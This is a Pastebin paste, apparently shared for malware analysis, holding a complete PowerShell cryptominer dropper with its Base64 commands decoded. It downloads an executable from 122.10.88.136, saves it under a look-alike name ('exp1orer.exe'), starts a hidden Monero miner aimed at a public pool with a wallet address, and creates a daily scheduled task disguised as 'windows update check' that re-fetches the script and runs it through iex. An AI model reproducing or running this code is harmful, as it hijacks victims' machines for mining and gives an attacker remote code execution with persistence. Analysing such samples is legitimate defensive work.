Advertisement
thlnk3r

ps_miner_04172018

Apr 17th, 2018
1,142
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.65 KB | None | 0 0
  1. # Source: 122.10.88[.]136/oop/main.ps1
  2.  
  3.  
  4. $download_file='c:\windows\tasks\exp1orer.exe'
  5.  
  6. function ConvertFrom-Base64($string) {
  7. $bytes = [System.Convert]::FromBase64String($string);
  8. $decoded = [System.Text.Encoding]::UTF8.GetString($bytes);
  9. return $decoded;
  10. }
  11.  
  12. if ((!((Get-Process exp1orer) -eq $null)))
  13. {
  14. exit
  15. }
  16.  
  17. if ((!(Test-Path $download_file))){
  18. $p = New-Object System.Net.WebClient;
  19. $p.DownloadFile("http://122.10.88.136/oop/consolehost.exe",$download_file);
  20. }
  21.  
  22.  
  23. $WSH = New-Object -Com WScript.Shell;
  24. $decode = ConvertFrom-Base64("Yzpcd2luZG93c1x0YXNrc1xleHAxb3Jlci5leGUgLW8gcG9vbC5zdXBwb3J0eG1yLmNvbTo1NTU1IC11IDRBTlUxaHpEU2J4RFpBQ1ZISGF6bmlKdVRFQ3B3WEZFM1ZFQnRlc2RVVHJEMUtGTHM2OGt4VjNaZzV6Q0M5YTM4dllud1R6aHJMYmZyVDlCcEw2YXB2ZFo1YVpCdGNBIC1wIHggLWsgLUIgLS1kb25hdGUtbGV2ZWw9MQ==");
  25. $WSH.Run($decode,0);
  26.  
  27. $decode2 = ConvertFrom-Base64("c2NodGFza3MgL2NyZWF0ZSAvdG4gIndpbmRvd3MgdXBkYXRlIGNoZWNrIiAvdHIgInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC1XaW5kb3dzdHlsZSBoaWRkZW4gLW5vbmludGVyYWN0aXZlIC1ub2xvZ28gaWV4IChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTIyLjEwLjg4LjEzNi9vb3AvbWFpbi5wczEnKSIgL3NjIGRhaWx5IC9zdCAxMjowMCAvRg==")
  28. $WSH.Run($decode2,0);
  29.  
  30.  
  31. # Decoded:
  32. c:\windows\tasks\exp1orer.exe -o pool.supportxmr.com:5555 -u 4ANU1hzDSbxDZACVHHazniJuTECpwXFE3VEBtesdUTrD1KFLs68kxV3Zg5zCC9a38vYnwTzhrLbfrT9BpL6apvdZ5aZBtcA -p x -k -B --donate-level=1
  33.  
  34. # Decoded2:
  35. schtasks /create /tn "windows update check" /tr "powershell.exe -executionpolicy bypass -Windowstyle hidden -noninteractive -nologo iex (New-Object Net.WebClient).DownloadString('http://122.10.88.136/oop/main.ps1')" /sc daily /st 12:00 /F
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement